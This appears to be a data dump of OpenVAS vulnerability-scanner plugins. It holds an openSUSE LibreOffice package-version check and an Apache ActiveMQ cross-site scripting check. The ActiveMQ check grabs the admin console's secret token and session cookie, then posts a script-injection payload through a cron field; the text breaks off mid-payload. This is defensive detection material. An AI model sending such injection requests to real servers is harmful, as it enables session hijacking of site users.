rpm:\"libreoffice-help-en-US~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-ZA\", rpm:\"libreoffice-help-en-ZA~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-es\", rpm:\"libreoffice-help-es~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-et\", rpm:\"libreoffice-help-et~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-eu\", rpm:\"libreoffice-help-eu~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-fi\", rpm:\"libreoffice-help-fi~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-fr\", rpm:\"libreoffice-help-fr~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-gl\", rpm:\"libreoffice-help-gl~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-gu-IN\", rpm:\"libreoffice-help-gu-IN~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-hi-IN\", rpm:\"libreoffice-help-hi-IN~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-hu\", rpm:\"libreoffice-help-hu~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-it\", rpm:\"libreoffice-help-it~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ja\", rpm:\"libreoffice-help-ja~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-km\", rpm:\"libreoffice-help-km~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ko\", rpm:\"libreoffice-help-ko~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-mk\", rpm:\"libreoffice-help-mk~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-nb\", rpm:\"libreoffice-help-nb~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-nl\", rpm:\"libreoffice-help-nl~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pl\", rpm:\"libreoffice-help-pl~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pt\", rpm:\"libreoffice-help-pt~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pt-BR\", rpm:\"libreoffice-help-pt-BR~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ru\", rpm:\"libreoffice-help-ru~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sk\", rpm:\"libreoffice-help-sk~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sl\", rpm:\"libreoffice-help-sl~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sv\", rpm:\"libreoffice-help-sv~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-tr\", rpm:\"libreoffice-help-tr~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-vi\", rpm:\"libreoffice-help-vi~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-zh-CN\", rpm:\"libreoffice-help-zh-CN~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-zh-TW\", rpm:\"libreoffice-help-zh-TW~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-crystal\", rpm:\"libreoffice-icon-theme-crystal~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-galaxy\", rpm:\"libreoffice-icon-theme-galaxy~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-hicontrast\", rpm:\"libreoffice-icon-theme-hicontrast~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-oxygen\", rpm:\"libreoffice-icon-theme-oxygen~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-tango\", rpm:\"libreoffice-icon-theme-tango~4.1.6.2~25.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-af\", rpm:\"libreoffice-l10n-af~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-am\", rpm:\"libreoffice-l10n-am~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ar\", rpm:\"libreoffice-l10n-ar~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-as\", rpm:\"libreoffice-l10n-as~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ast\", rpm:\"libreoffice-l10n-ast~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-be-BY\", rpm:\"libreoffice-l10n-be-BY~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-bg\", rpm:\"libreoffice-l10n-bg~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-br\", rpm:\"libreoffice-l10n-br~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ca\", rpm:\"libreoffice-l10n-ca~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-cs\", rpm:\"libreoffice-l10n-cs~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-cy\", rpm:\"libreoffice-l10n-cy~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-da\", rpm:\"libreoffice-l10n-da~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-de\", rpm:\"libreoffice-l10n-de~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-el\", rpm:\"libreoffice-l10n-el~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-en-GB\", rpm:\"libreoffice-l10n-en-GB~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-en-ZA\", rpm:\"libreoffice-l10n-en-ZA~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-eo\", rpm:\"libreoffice-l10n-eo~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-es\", rpm:\"libreoffice-l10n-es~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-et\", rpm:\"libreoffice-l10n-et~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-eu\", rpm:\"libreoffice-l10n-eu~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-fi\", rpm:\"libreoffice-l10n-fi~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-fr\", rpm:\"libreoffice-l10n-fr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ga\", rpm:\"libreoffice-l10n-ga~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gd\", rpm:\"libreoffice-l10n-gd~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gl\", rpm:\"libreoffice-l10n-gl~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-gu-IN\", rpm:\"libreoffice-l10n-gu-IN~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-he\", rpm:\"libreoffice-l10n-he~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hi-IN\", rpm:\"libreoffice-l10n-hi-IN~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hr\", rpm:\"libreoffice-l10n-hr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-hu\", rpm:\"libreoffice-l10n-hu~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-id\", rpm:\"libreoffice-l10n-id~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-is\", rpm:\"libreoffice-l10n-is~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-it\", rpm:\"libreoffice-l10n-it~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ja\", rpm:\"libreoffice-l10n-ja~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ka\", rpm:\"libreoffice-l10n-ka~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-km\", rpm:\"libreoffice-l10n-km~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-kn\", rpm:\"libreoffice-l10n-kn~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ko\", rpm:\"libreoffice-l10n-ko~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-lt\", rpm:\"libreoffice-l10n-lt~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-mk\", rpm:\"libreoffice-l10n-mk~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ml\", rpm:\"libreoffice-l10n-ml~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-mr\", rpm:\"libreoffice-l10n-mr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nb\", rpm:\"libreoffice-l10n-nb~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nl\", rpm:\"libreoffice-l10n-nl~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nn\", rpm:\"libreoffice-l10n-nn~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-nr\", rpm:\"libreoffice-l10n-nr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-om\", rpm:\"libreoffice-l10n-om~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-or\", rpm:\"libreoffice-l10n-or~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pa-IN\", rpm:\"libreoffice-l10n-pa-IN~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pl\", rpm:\"libreoffice-l10n-pl~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pt\", rpm:\"libreoffice-l10n-pt~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-pt-BR\", rpm:\"libreoffice-l10n-pt-BR~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ro\", rpm:\"libreoffice-l10n-ro~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ru\", rpm:\"libreoffice-l10n-ru~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-rw\", rpm:\"libreoffice-l10n-rw~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sh\", rpm:\"libreoffice-l10n-sh~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sk\", rpm:\"libreoffice-l10n-sk~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sl\", rpm:\"libreoffice-l10n-sl~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sr\", rpm:\"libreoffice-l10n-sr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ss\", rpm:\"libreoffice-l10n-ss~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-st\", rpm:\"libreoffice-l10n-st~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-sv\", rpm:\"libreoffice-l10n-sv~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ta\", rpm:\"libreoffice-l10n-ta~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-te\", rpm:\"libreoffice-l10n-te~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-tg\", rpm:\"libreoffice-l10n-tg~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-th\", rpm:\"libreoffice-l10n-th~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-tr\", rpm:\"libreoffice-l10n-tr~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ts\", rpm:\"libreoffice-l10n-ts~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ug\", rpm:\"libreoffice-l10n-ug~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-uk\", rpm:\"libreoffice-l10n-uk~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-ve\", rpm:\"libreoffice-l10n-ve~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-vi\", rpm:\"libreoffice-l10n-vi~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-xh\", rpm:\"libreoffice-l10n-xh~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zh-CN\", rpm:\"libreoffice-l10n-zh-CN~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zh-TW\", rpm:\"libreoffice-l10n-zh-TW~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-zu\", rpm:\"libreoffice-l10n-zu~4.1.6.2~25.2\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-22T16:42:08", "bulletinFamily": "scanner", "description": "This host is installed with Apache ActiveMQ and is prone to multiple\n cross site scripting vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-08-13T00:00:00", "id": "OPENVAS:1361412562310803866", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803866", "title": "Apache ActiveMQ < 5.9.0 Multiple Cross Site Scripting Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_activemq_cron_jobs_xss_vuln.nasl 11883 2018-10-12 13:31:09Z cfischer $\n#\n# Apache ActiveMQ < 5.9.0 Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:activemq\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803866\");\n script_version(\"$Revision: 11883 $\");\n script_cve_id(\"CVE-2013-1879\", \"CVE-2013-1880\");\n script_bugtraq_id(61142, 65615);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 15:31:09 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-13 14:52:49 +0530 (Tue, 13 Aug 2013)\");\n script_name(\"Apache ActiveMQ < 5.9.0 Multiple Cross Site Scripting Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_activemq_detect.nasl\");\n script_require_ports(\"Services/www\", 8161);\n script_mandatory_keys(\"ActiveMQ/Web/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54073\");\n script_xref(name:\"URL\", value:\"https://issues.apache.org/jira/browse/AMQ-4397\");\n script_xref(name:\"URL\", value:\"https://issues.apache.org/jira/browse/AMQ-4398\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache ActiveMQ and is prone to multiple\n cross site scripting vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a Crafted HTTP POST request and check whether it is able to read the\n cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 5.9.0 or later.\");\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - an improper validation of the command in a user crontab file upon processing by the scheduled.jsp script\n\n - the Portfolio publisher servlet in the demo web application allows remote attackers to inject arbitrary web\n script or HTML via the refresh parameter to demo/portfolioPublish\");\n script_tag(name:\"affected\", value:\"Apache ActiveMQ 5.8.0 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) ) exit( 0 );\nget_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection-NVT\n\nurl = \"/admin/send.jsp\";\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( res && res =~ \"HTTP/1\\.[01] 200\" && \"Send Messages\" >< res ) {\n\n host = http_host_name( port:port );\n\n secKey = eregmatch( string:res, pattern: \"<input type=.hidden. name=.secret. value=.([a-z0-9\\-]+)\" );\n if( ! secKey[1] ) exit( 0 );\n\n cookie = eregmatch( pattern:\"Set-Cookie: JSESSIONID=([0-9a-z]*);\", string:res );\n if( ! cookie[1] ) exit( 0 );\n\n url = \"/admin/sendMessage.action\";\n\n postData = string(\"secret=\",secKey[1],\"&JMSDestination=xss-test&\",\n \"JMSDestinationType=queue&JMSCorrelationID=&JM\",\n \"SReplyTo=&JMSPriority=&JMSType=&JMSTimeToLive\",\n \"=&JMSXGroupID=&JMSXGroupSeq=&AMQ_SCHEDULED_DE\",\n \"LAY=&AMQ_SCHEDULED_PERIOD=&AMQ_SCHEDULED_REPE\",\n \"AT=&AMQ_SCHEDULED_CRON=*+*+*+*+*%22%3E%3Cscri\",\n 